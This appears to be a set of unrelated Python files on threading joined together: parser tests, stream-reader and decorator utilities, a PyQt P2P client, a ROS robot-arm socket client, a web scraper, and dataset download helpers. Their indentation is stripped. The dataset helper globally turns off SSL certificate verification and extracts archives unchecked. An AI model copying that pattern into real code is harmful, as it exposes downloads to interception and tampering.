args=[rparser, reads_counts_per_thread, tnum]
)
threads.append(t)
t.start()
for t in threads:
t.join()
assert reads_count_1thr == sum(reads_counts_per_thread), \
reads_counts_per_thread
@pytest.mark.multithread
def test_with_multiple_threads_big():
test_with_multiple_threads(testfile="test-large.fa")
@pytest.mark.multithread
def test_old_illumina_pair_mating():
import threading
rparser = ReadParser(utils.get_test_data("test-reads.fa"))
def thread_1_runtime(rparser):
for _ in rparser:
pass
def thread_2_runtime(rparser):
for readnum, _ in enumerate(rparser):
if 0 == readnum:
pass
t1 = threading.Thread(target=thread_1_runtime, args=[rparser])
t2 = threading.Thread(target=thread_2_runtime, args=[rparser])
t1.start()
t2.start()
t1.join()
t2.join()
@pytest.mark.multithread
def test_casava_1_8_pair_mating():
import threading
# Note: This file, when used in conjunction with a 64 KiB per-thread
# prefetch buffer, tests the paired read mating logic with the
# Casava >= 1.8 read name format.
rparser = ReadParser(utils.get_test_data("test-reads.fq.bz2"))
def thread_1_runtime(rparser):
for _ in rparser:
pass
def thread_2_runtime(rparser):
for readnum, _ in enumerate(rparser):
if 0 == readnum:
pass
# assert "895:1:1:1761:13189 2:N:0:NNNNN" == read.name, read.name
t1 = threading.Thread(target=thread_1_runtime, args=[rparser])
t2 = threading.Thread(target=thread_2_runtime, args=[rparser])
t1.start()
t2.start()
t1.join()
t2.join()
def test_read_truncated():
rparser = ReadParser(utils.get_test_data("truncated.fq"))
try:
for _ in rparser:
pass
assert 0, "No exception raised on a truncated file"
except ValueError as err:
assert "Sequence is empty" in str(err), str(err)
def test_iterator_identities():
rparser = \
ReadParser(utils.get_test_data("test-abund-read-paired.fa"))
assert rparser is rparser.__iter__()
assert rparser is rparser.iter_reads()
@pytest.mark.known_failing
def test_read_pair_iterator_in_error_mode():
assert 0
rparser = \
ReadParser(utils.get_test_data("test-abund-read-paired.fa"))
    # If it walks like an iterator and quacks like an iterator...
rpi = rparser.iter_read_pairs()
assert "__iter__" in dir(rpi)
assert "next" in dir(rpi)
# Are the alleged pairs actually pairs?
read_pairs_1 = []
for read_1, read_2 in rpi:
read_pairs_1.append([read_1, read_2])
assert read_1.name[: 19] == read_2.name[: 19]
# Reload parser.
# Note: No 'rewind' or 'reset' capability at the time of this writing.
rparser = \
ReadParser(utils.get_test_data("test-abund-read-paired.fa"))
# Ensure that error mode is the default mode.
read_pairs_2 = []
for read_1, read_2 \
in rparser.iter_read_pairs(ReadParser.PAIR_MODE_ERROR_ON_UNPAIRED):
read_pairs_2.append([read_1, read_2])
matches = [(rp1, rp2) for rp1, rp2 in zip(read_pairs_1, read_pairs_2)
if rp1[0].name == rp2[0].name]
assert all(matches) # Assert ALL the matches. :-]
@pytest.mark.linux
def test_read_pair_iterator_in_error_mode_xfail():
rparser = \
ReadParser(utils.get_test_data("test-abund-read-impaired.fa"))
failed = True
try:
for _ in rparser.iter_read_pairs():
pass
failed = False
except ValueError as exc:
assert "Invalid read pair" in str(exc), str(exc)
assert failed
def test_read_pair_iterator_in_error_mode_xfail_osxsafe():
rparser = \
ReadParser(utils.get_test_data("test-abund-read-impaired.fa"))
failed = True
try:
for _ in rparser.iter_read_pairs():
pass
failed = False
except ValueError:
pass
assert failed
@pytest.mark.known_failing
def test_read_pair_iterator_in_ignore_mode():
assert 0
rparser = \
ReadParser(utils.get_test_data("test-abund-read-impaired.fa"))
read_pairs = []
for read_1, read_2 \
in rparser.iter_read_pairs(ReadParser.PAIR_MODE_IGNORE_UNPAIRED):
read_pairs.append([read_1, read_2])
assert read_1.name[: 19] == read_2.name[: 19]
assert 2 == len(read_pairs)
def test_constructor():
# Note: Using a data file with only one read.
try:
ReadParser(utils.get_test_data("single-read.fq"), "a")
assert 0, ("ReadParser's constructor shouldn't accept a character for "
"the number of threads")
except TypeError as err:
print(str(err))
try:
ReadParser("non-existent-file-name")
assert 0, "ReadParser shouldn't accept a non-existant file name"
except ValueError as err:
print(str(err))
except OSError as err:
print(str(err))
def test_iternext():
try:
rparser = ReadParser(utils.get_test_data("fakelump.fa.stoptags.txt"))
read_pairs = []
for read_1, read_2 in rparser.iter_read_pairs():
            read_pairs.append((read_1, read_2))
assert 0, "Shouldn't be able to iterate over non FASTA file"
except OSError as err:
print(str(err))
except ValueError as err:
print(str(err))
# vim: set filetype=python tabstop=4 softtabstop=4 shiftwidth=4 expandtab:
# vim: set textwidth=79:
|
nbsp.py
|
# _*_ coding:UTF-8 _*_
import time
from threading import Thread, Event
from six.moves import queue
from .logger import get_logger
LOGGING = get_logger(__name__)
class NonBlockingStreamReader:
def __init__(self, stream, raise_EOF=False, print_output=True, print_new_line=True, name=None):
'''
stream: the stream to read from.
Usually a process' stdout or stderr.
raise_EOF: if True, raise an UnexpectedEndOfStream
when stream is EOF before kill
print_output: if True, print when readline
'''
self._s = stream
self._q = queue.Queue()
self._lastline = None
self.name = name or id(self)
def _populateQueue(stream, queue, kill_event):
'''
            Collect lines from 'stream' and put them in 'queue'.
'''
while not kill_event.is_set():
line = stream.readline()
if line:
queue.put(line)
if print_output:
# print only new line
if print_new_line and line == self._lastline:
continue
self._lastline = line
LOGGING.debug("[%s]%s" % (self.name, repr(line.strip())))
elif kill_event.is_set():
break
elif raise_EOF:
raise UnexpectedEndOfStream
else:
# print("EndOfStream: %s" % self.name)
break
self._kill_event = Event()
self._t = Thread(target=_populateQueue, args=(self._s, self._q, self._kill_event), name="nbsp_%s"%self.name)
self._t.daemon = True
self._t.start() # start collecting lines from the stream
def readline(self, timeout=None):
try:
return self._q.get(block=timeout is not None, timeout=timeout)
except queue.Empty:
return None
def read(self, timeout=0):
time.sleep(timeout)
lines = []
while True:
line = self.readline()
if line is None:
break
lines.append(line)
return b"".join(lines)
def kill(self):
self._kill_event.set()
class UnexpectedEndOfStream(Exception):
pass
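# Hedged usage sketch (illustrative only; the command below is an assumption):
def _example_usage():
    import subprocess
    proc = subprocess.Popen(["ping", "127.0.0.1"], stdout=subprocess.PIPE)
    reader = NonBlockingStreamReader(proc.stdout, name="ping")
    line = reader.readline(timeout=1.0)  # returns None if nothing arrives within 1s
    LOGGING.debug("first line: %r", line)
    reader.kill()
    proc.terminate()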
|
Decoradores.py
|
from time import time
import threading
from multiprocessing import Process
from apps.Util_apps.LogProject import logging
def count_elapsed_time(f):
"""
Decorator.
Execute the function and calculate the elapsed time.
Print the result to the standard output.
"""
def wrapper(*args, **kwargs):
# Start counting.
start_time = time()
# Take the original function's return value.
ret = f(*args, **kwargs)
# Calculate the elapsed time.
elapsed_time = time() - start_time
print("Elapsed time: %0.10f seconds." % elapsed_time)
return ret
return wrapper
def execute_in_thread(name=None, daemon=None, ponerDelay=None):
def _execute_in_thread(f):
"""
Decorator.
        Execute the function in a thread.
"""
def wrapper(*args, **kwargs):
thread_f = threading.Thread(target=f, args=args, kwargs=kwargs)
            if daemon is not None:
                thread_f.daemon = bool(daemon)
            if name is not None:
                thread_f.name = name
logging.info("Se ha lanzado un nuevo hilo usando el decorador con nombre: '" + name + "'.")
else:
logging.info("Se ha lanzado un nuevo hilo usando el decorador.")
thread_f.start()
if ponerDelay is not None:
thread_f.join()
# logging.info("Hilo terminado")
return thread_f
return wrapper
return _execute_in_thread
def execute_in_thread_timer(seconds):
def _execute_in_thread_timer(f):
"""
Decorator.
        Execute the function in a timer thread, without parameters.
"""
def wrapper(*args, **kwargs):
thread_f = threading.Timer(seconds, f)
logging.info("Se ha lanzado un nuevo hilo con timer usando el decorador.")
thread_f.start()
return thread_f
return wrapper
return _execute_in_thread_timer
def execute_in_process(f):
"""
Decorator.
    Execute the function in a separate process.
"""
def wrapper(*args, **kwargs):
logging.info("Se ha lanzado un nuevo proceso")
process_f = Process(target=f, args=args, kwargs=kwargs)
process_f.start()
return process_f
return wrapper
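# Hedged usage sketch (illustrative only; the task function below is an assumption):
def _decorator_usage_example():
    @execute_in_thread(name="demo-worker", daemon=True)
    def _demo_task(n):
        return sum(range(n))
    # The wrapped call launches a background thread and returns the Thread object.
    worker = _demo_task(1000000)
    return worker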
|
clientgui.py
|
from PyQt5.QtWidgets import QLabel ,QWidget, QMainWindow,QApplication,QMessageBox
from PyQt5.QtCore import QStringListModel
from PyQt5.QtWidgets import QFileDialog,QListView  # must be imported, otherwise the program crashes with -1073740791 (0xC0000409)
from UI import Ui_MainWindow  # "UI" refers to the name of the UI file
from os import path,listdir
from server import Node, UNHANDLED  # call methods on the RPC server and receive their return values
from client import random_string
from threading import Thread
from time import sleep
from xmlrpc.client import ServerProxy, Fault
import sys
HEAD_START = 0.1 # Seconds
SECRET_LENGTH = 100
class ListableNode(Node):  # subclass derived from Node that adds a directory-listing method
def list(self):
return listdir(self.dirname)
class PyQtLogic(QMainWindow, Ui_MainWindow):  # main window class; QMainWindow comes from the PyQt5 import above
def __init__(self):
        super(PyQtLogic,self).__init__()  # initialize the parent QMainWindow
        self.setupUi(self)  # build the UI from the inherited Ui_MainWindow class
def aboutthis(self):
        QMessageBox.about(self, 'About this program', 'An XML-RPC based P2P file sharing program')
    def open(self):  # "browse" slot function
        dirname=QFileDialog.getExistingDirectory(self,'Open folder','C:\\Users\\wdther\\Desktop\\XML-RPC')  # backslashes must be escaped, hence the double backslashes
file1 = dirname + '\\urlfile.txt'
self.dir.setText(file1)
url = self.webaddress.text()
self.tips.setText("网址已获取" + url)
urlfile=file1
self.node_setup(url, dirname, urlfile)
        self.update_list()  # original note: unsure why this call is needed
def fetch(self):
query = self.filename.text()
print(query)
try:
self.server.fetch(query, self.secret)
self.update_list()
except Fault as f:
if f.faultCode != UNHANDLED: raise
print("Couldn't find the file", query)
def node_setup(self, url, dirname, urlfile):
self.secret = random_string(SECRET_LENGTH)
n = ListableNode(url, dirname, self.secret)
#n = Node(url, dirname, self.secret)
t = Thread(target=n._start)
        t.daemon = True
t.start()
        # give the server a head start:
sleep(HEAD_START)
self.server = ServerProxy(url)
urlfile = path.join(dirname, urlfile)
for line in open(urlfile):
line = line.strip()
self.server.hello(line)
self.tips.setText("已经连接服务器,下一步获取文件" )
def update_list(self):
slm=QStringListModel()
        self.qlist=self.server.list()  # the returned data is a list, not a string
        slm.setStringList(self.qlist)
self.filelistView.setModel(slm)
if __name__ == "__main__":
    app = QApplication(sys.argv)  # a QApplication must exist before any PyQt widgets are created
    window = PyQtLogic()  # instantiate the main window class
    window.show()  # show the window
    sys.exit(app.exec_())  # run the event loop and exit the process with its return code
|
HiwinRA605_socket_ros_20190614135358.py
|
#!/usr/bin/env python3
# license removed for brevity
# Receive commands from the strategy side and forward them over a socket to the control PC
import socket
## multithreading
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import enum
data = '0'  # initial value of the transmitted data
Arm_feedback = 1  # assume the arm is busy
state_feedback = 0
NAME = 'socket_server'
client_response = 0  # initial value of the response counter
##------------class pos-------
class pos():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
        return  # PEP 479: do not raise StopIteration inside a generator (Python 3.7+)
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
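## Hedged illustration of the switch/case recipe above (the values are assumptions):
def _switch_example(value):
    for case in switch(value):
        if case(1):
            return 'one'
        if case(2, 3):
            return 'two or three'
        if case():  # a call with no arguments always matches, i.e. the default branch
            return 'something else'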
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server side-------
def point_data(req):  ## receive pose data sent from the strategy side
global client_response
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
client_response = client_response + 1
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req):  ## receive arm-mode data sent from the strategy side
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
return(1)
##-------Arm Speed Mode------------###
def Speed_Mode(req):  ## receive speed-mode data sent from the strategy side
socket_cmd.Speedmode = int('%s'%req.Speedmode)
return(1)
def socket_server():  ## create the server node
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server side end-------
##---------- socket packet transmission --------------##
##-----------socket client--------
def socket_client():
global Arm_feedback,data
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(s.recv(1024))
    start_input=int(input('Press 1 to start transmission, 3 to quit: '))  # start command input
#start_input = 1
if start_input==1:
while 1:
            ##--------------- send arm commands over the socket -----------------
            #------- select mode --------
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
                #------- set arm speed --------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
                #------- set arm delay time --------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
                #------- set arm fast/safe speed mode --------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
            socket_cmd.action = 5  ## reset to the initial mode state
            s.send(data.encode('utf-8'))  # encode the command string before sending it over the socket
            feedback_str = s.recv(1024)
            # the arm controller reports the arm state
            if str(feedback_str[2]) == '70':  # 'F': arm is ready to accept the next motion command
feedback = 0
socket_client_arm_state(feedback)
print("isbusy false")
            if str(feedback_str[2]) == '84':  # 'T': arm is busy and cannot execute the next motion command
feedback = 1
socket_client_arm_state(feedback)
print("isbusy true")
            if str(feedback_str[2]) == '54':  # '6': strategy finished
feedback = 6
socket_client_arm_state(feedback)
print("shutdown")
#Arm_feedback = TCP.Is_busy(feedback)
            ##--------------- send arm commands over the socket end -----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
s.close()
##-----------socket client end--------
##------------- socket packet transmission end --------------##
## multithreading
def thread_test():
    socket_client()
## multithreading end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
    socket_cmd.action = 5  ## set the initial mode state
    t = threading.Thread(target=thread_test)
    t.start()  # start the worker thread
socket_server()
t.join()
# Ctrl+K Ctrl+C  Add line comment
# Ctrl+K Ctrl+U  Remove line comment
# Ctrl+] / Ctrl+[  Indent / outdent line
|
book_scraper_multithreading.py
|
from bs4 import BeautifulSoup
from urllib.request import urlopen
import threading
from multiprocessing.pool import ThreadPool
import queue
import csv
# Get the next page url from the current page url
def get_next_page_url(url):
page = urlopen(url)
soup_page = BeautifulSoup(page, 'lxml')
page.close()
# Get current page and next page tag
current_page_tag = soup_page.find(class_="current")
next_page_tag = current_page_tag.find_next_sibling()
# Check if the current page is the last one
if next_page_tag is None:
next_page_url = None
else:
next_page_url = next_page_tag['href']
return next_page_url
# Get the book detail urls by page url
def get_book_detail_urls(url):
page = urlopen(url)
soup = BeautifulSoup(page, 'lxml')
page.close()
urls = []
book_header_tags = soup.find_all(class_="entry-title")
for book_header_tag in book_header_tags:
urls.append(book_header_tag.a['href'])
return urls
# Get the book detail info by book detail url
def get_book_detail_info(url, q):
# print(url)
page = urlopen(url)
book_detail_soup = BeautifulSoup(page, 'lxml')
page.close()
title_tag = book_detail_soup.find(class_="single-title")
title = title_tag.string
isbn_key_tag = book_detail_soup.find(text="Isbn:").parent
isbn_tag = isbn_key_tag.find_next_sibling()
isbn = isbn_tag.string.strip() # Remove the whitespace with the strip() method
# book_info = { 'title': title, 'isbn': isbn }
book_info = [title, isbn]
q.put(book_info)
def run():
url = "http://www.allitebooks.com/programming/net/page/1/"
book_info_list = []
def scapping_by_page(book_detail_urls):
qs = []
for book_detail_url in book_detail_urls:
# Get the return value from the thread
q = queue.Queue()
thr = threading.Thread(target=get_book_detail_info, args=(book_detail_url, q))
thr.start()
qs.append(q)
for q in qs:
book_info = q.get()
print(book_info)
book_info_list.append(book_info)
def scapping(page_url):
print(page_url)
book_detail_urls = get_book_detail_urls(page_url)
scapping_by_page(book_detail_urls)
next_page_url = get_next_page_url(page_url)
if next_page_url is not None:
scapping(next_page_url)
else:
return
scapping(url)
print(len(book_info_list))
save_to_csv(book_info_list)
def save_to_csv(list):
with open('books.csv', 'w', newline='') as fp:
a = csv.writer(fp, delimiter=',')
a.writerow(['title','isbn'])
a.writerows(list)
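# Hedged sketch: the ThreadPool imported above (and otherwise unused) could replace the
# per-URL Thread/Queue pattern in scapping_by_page; the pool size here is an assumption.
def scrape_page_with_pool(book_detail_urls, pool_size=8):
    results = queue.Queue()
    with ThreadPool(pool_size) as pool:
        pool.starmap(get_book_detail_info, [(url, results) for url in book_detail_urls])
    return [results.get() for _ in book_detail_urls]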
run()
|
dataset_utils.py
|
#!/usr/bin/env python
# coding=utf8
"""Contains utilities for downloading and converting datasets."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import gzip
import os
import shutil
import ssl
import sys
import tarfile
import threading
import zipfile
from datetime import datetime
import numpy as np
import tensorflow as tf
from six.moves import urllib
def log(msg, *args):
msg = '[{}] ' + msg
print(msg.format(datetime.now(), *args))
sys.stdout.flush()
def str2bool(v):
y = ['yes', 'true', 't', 'y', '1']
n = ['no', 'false', 'f', 'n', '0']
if v.lower() in y:
return True
elif v.lower() in n:
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def get_image_file_format(filename):
image_name = filename.rsplit('.', 1)
if len(image_name) <= 1:
return 'jpg' # default format
image_format = image_name[-1].lower()
if image_format in ['jpg', 'jpeg']:
return 'jpg'
elif image_format in ['bmp', 'png', 'gif']:
return image_format
return ""
def download_file(url, data_dir, filename):
"""
    Download data from a URL.
    :param url: URL pointing to the file to download.
    :param data_dir: Directory path where the file is stored.
    :param filename: Name of the file to save.
    :return: Path of the saved file.
"""
if not os.path.exists(data_dir):
os.makedirs(data_dir)
filepath = os.path.join(data_dir, filename)
def _progress(count, block_size, total_size):
if total_size > 0:
sys.stdout.write('\r>> Downloading %s %.1f%%' % (filename, float(count * block_size) / float(total_size) * 100.0))
else:
sys.stdout.write('\r>> Downloading %s %s' % (filename, '.' * (count % 20)))
sys.stdout.flush()
# This is the way to allow unverified SSL
ssl._create_default_https_context = ssl._create_unverified_context
filepath, _ = urllib.request.urlretrieve(url, filepath, _progress)
statinfo = os.stat(filepath)
print()
log('Successfully downloaded', filename, statinfo.st_size, 'bytes.')
return filepath
def download_and_uncompress_tarball(tarball_url, data_dir, filename):
"""
    Download a tar archive from the URL and extract it.
    :param tarball_url: URL of the tarball file.
    :param data_dir: The directory where the output files are stored.
    :param filename: String, path to an output file.
    :return: The directory where the output files are stored.
"""
filepath = download_file(tarball_url, data_dir, filename)
if filepath.endswith('tar'):
tarfile.open(filepath, 'r:').extractall(data_dir)
elif filepath.endswith('tar.gz'):
tarfile.open(filepath, 'r:gz').extractall(data_dir)
elif filepath.endswith('tgz'):
tarfile.open(filepath, 'r:gz').extractall(data_dir)
return data_dir
def download_and_uncompress_zip(zip_url, data_dir, zipped_filename):
"""
    Download a zip archive from the URL and extract it.
    :param zip_url: The URL of the zip file.
    :param data_dir: The directory where the output files are stored.
    :param zipped_filename: String, path to an output file.
    :return: Path of the downloaded zip file.
"""
zip_suffix = '.zip'
zip_len = len(zip_suffix)
assert len(zipped_filename) >= zip_len and zipped_filename[-zip_len:] == zip_suffix
zipped_filepath = download_file(zip_url, data_dir, zipped_filename)
zip_ref = zipfile.ZipFile(zipped_filepath, 'r')
zip_ref.extractall(data_dir)
zip_ref.close()
return zipped_filepath
def download_and_uncompress_gzip(gzip_url, data_dir, zipped_filename):
"""
Downloads the `gzip_url` and uncompresses it locally.
:param gzip_url: The URL of gzip file.
:param data_dir: The directory where the output files are stored.
    :param zipped_filename: String, path to an output file.
    :return: Uncompressed file path.
"""
zip_suffix = '.gz'
zip_len = len(zip_suffix)
assert len(zipped_filename) >= zip_len and zipped_filename[-zip_len:] == zip_suffix
zipped_filepath = download_file(gzip_url, data_dir, zipped_filename)
filepath = zipped_filepath[:-zip_len]
with gzip.open(zipped_filepath, 'rb') as f_in:
        # gzip only supports a single file.
with tf.gfile.Open(filepath, 'wb') as f_out:
shutil.copyfileobj(f_in, f_out)
return filepath
def thread_execute(num_threads, fn):
"""
    Run fn in parallel, one invocation per thread.
    :param num_threads: Number of threads.
    :param fn: Function executed by each thread; the thread index is passed as its first argument.
"""
assert num_threads > 0
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
threads = []
for idx in range(num_threads):
t = threading.Thread(target=fn, args=(idx,))
t.start()
threads.append(t)
coord.join(threads) # Wait for all the threads to terminate.
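# Hedged sketch: pairing thread_execute() with split_range() to process a list in
# parallel; the worker body and item list are assumptions, not part of the original.
def _thread_execute_example(items, num_threads=4):
    ranges = split_range(len(items), num_threads)
    def _worker(thread_idx):
        start, end = ranges[thread_idx]
        for item in items[start:end]:
            log('thread {} processed {}', thread_idx, item)
    thread_execute(num_threads, _worker)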
def split(contents, num_split, start_index=0):
"""
    Split contents into num_split chunks and return them as a list.
    :param contents: List of data to split.
    :param num_split: Number of chunks.
    :param start_index: Start index into contents; defaults to 0.
    :return: Nested list with num_split sub-lists. [[...],[...],...]
"""
rs = np.linspace(start_index, len(contents), num_split + 1).astype(np.int)
result = [contents[rs[i]:rs[i + 1]] for i in range(len(rs) - 1)]
return result
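# Worked example (computed from the definition above):
#   split(list(range(10)), 3) == [[0, 1, 2], [3, 4, 5], [6, 7, 8, 9]]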
def split_range(total, num_split, start_index=0):
"""
    Split an integer range into num_split pieces and return the start/end indices.
    :param total: Maximum value of the range to split.
    :param num_split: Number of pieces.
    :param start_index: Start index of the range; defaults to 0.
    :return: List of num_split (start, end) index tuples. [(s,e),(s,e),...]
"""
rs = np.linspace(start_index, total, num_split + 1).astype(np.int)
result = [(rs[i], rs[i + 1]) for i in range(len(rs) - 1)]
return result
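# Worked example (computed from the definition above):
#   split_range(10, 3) == [(0, 3), (3, 6), (6, 10)]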
def make_shard_offsets(total, num_threads, num_shards):
"""
    Build the index ranges used by each thread and by each shard within a thread.
    :param total: Maximum value of the range to split.
    :param num_threads: Number of threads.
    :param num_shards: Total number of shards, equal to (num_threads * num_shards_per_thread).
    :return: Nested list of the form [[(s,e),(s,e)...],[()()...],...].
"""
assert total > 0
assert num_threads > 0
assert num_shards > 0
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
thread_range = split_range(total, num_threads)
offsets = []
for start, end in thread_range:
offsets.append(split_range(end, num_shards_per_batch, start_index=start))
return offsets
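# Worked example (computed from the definition above):
#   make_shard_offsets(total=8, num_threads=2, num_shards=4)
#   == [[(0, 2), (2, 4)], [(4, 6), (6, 8)]]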
def make_shard_filenames(name, total, num_threads, num_shards):
assert total > 0
assert num_threads > 0
assert num_shards > 0
offsets = make_shard_offsets(total, num_threads, num_shards)
filenames = []
shard_idx = 0
for thread_offsets in offsets:
shard_filenames = []
for _ in thread_offsets:
filename = '%s-%.5d-of-%.5d' % (name, shard_idx, num_shards)
shard_idx += 1
shard_filenames.append(filename)
filenames.append(shard_filenames)
return filenames
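# Worked example (computed from the definition above):
#   make_shard_filenames('train', total=8, num_threads=2, num_shards=4)
#   == [['train-00000-of-00004', 'train-00001-of-00004'],
#       ['train-00002-of-00004', 'train-00003-of-00004']]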
def make_label_id_to_name(data_dir, start_index=0):
"""
    Map label directory names to the label ids used for training.
    Converts data laid out as below into a dict such as {0: labelA, 1: labelB}.
    data_dir/labelA/xxx.jpg
    data_dir/labelB/yyy.jpg
    :param data_dir: Parent directory containing the label directories.
    :return: dict mapping id -> name.
"""
id_to_name = {}
label_index = 0 + start_index
    # os.listdir() does not guarantee ordering, so always sort the result.
for label_name in sorted(os.listdir(data_dir)):
path = os.path.join(data_dir, label_name)
if os.path.isdir(path):
image_file_path = '%s/*' % (path)
matching_files = tf.gfile.Glob(image_file_path)
id_to_name[label_index] = label_name
label_index += 1
return id_to_name
def make_label_name_to_id(data_dir, start_index=0):
"""
    Map label directory names to the label ids used for training.
    Converts data laid out as below into a dict such as {labelA: 0, labelB: 1}.
    data_dir/labelA/xxx.jpg
    data_dir/labelB/yyy.jpg
    :param data_dir: Parent directory containing the label directories.
    :return: dict mapping name -> id.
"""
name_to_id = {}
label_index = 0 + start_index
    # os.listdir() does not guarantee ordering, so always sort the result.
for label_name in sorted(os.listdir(data_dir)):
path = os.path.join(data_dir, label_name)
if os.path.isdir(path):
name_to_id[label_name] = label_index
label_index += 1
return name_to_id
def write_label_id_to_name(name, data_dir, output_dir=None, start_index=0):
"""
    Write the id_to_name mapping to a labels file.
    :param name: Type of the data being saved, e.g. train, validation.
    :param data_dir: Parent directory containing the label directories.
    :param output_dir: Directory to write the file to; data_dir is used when None.
"""
id_to_name = make_label_id_to_name(data_dir, start_index)
output_filename = '%s_labels.txt' % (name)
if not output_dir:
output_dir = data_dir
output_file = os.path.join(output_dir, output_filename)
with open(output_file, 'w') as f:
for index in sorted(id_to_name):
f.write('%d:%s\n' % (index, id_to_name[index]))
def check_label_id_to_name_files(data_dir, train_name='train', validation_name='validation'):
train_filename = os.path.join(data_dir, '%s_labels.txt' % (train_name))
validation_filename = os.path.join(data_dir, '%s_labels.txt' % (validation_name))
def _load_id_to_name(filename):
id_to_name = {}
with open(filename, 'r') as f:
labels = f.readlines()
for label in labels:
label_id, name = label.strip().split(':', 2)
id_to_name[int(label_id)] = name
return id_to_name
train = _load_id_to_name(train_filename)
validation = _load_id_to_name(validation_filename)
for key, val in train.items():
        if key not in validation:
            log("Warn: The label index (%d:%s) exists in train but not in validation." % (key, val))
elif val != validation[key]:
msg = "train(%d:%s) vs. validation(%d:%s)" % (key, val, key, validation[key])
raise ValueError("Invalid label : {}".format(msg))
for key, val in validation.items():
        if key not in train:
            msg = "validation label (%d:%s) does not exist in train labels." % (key, val)
raise ValueError("Invalid label : {}".format(msg))
def write_tfrecord_info(output_dir, num_train, num_validation):
"""
    Write the train/validation record counts to a file.
    :param output_dir: Directory to write the file to.
    :param num_train: Number of train examples.
    :param num_validation: Number of validation examples.
"""
id_to_name = make_label_id_to_name(output_dir)
output_filename = 'tfrecord_info.txt'
output_file = os.path.join(output_dir, output_filename)
with open(output_file, 'w') as f:
f.write('tfrecord info\n')
f.write('- train: %s\n' % (num_train))
f.write('- validation: %s\n' % (num_validation))
|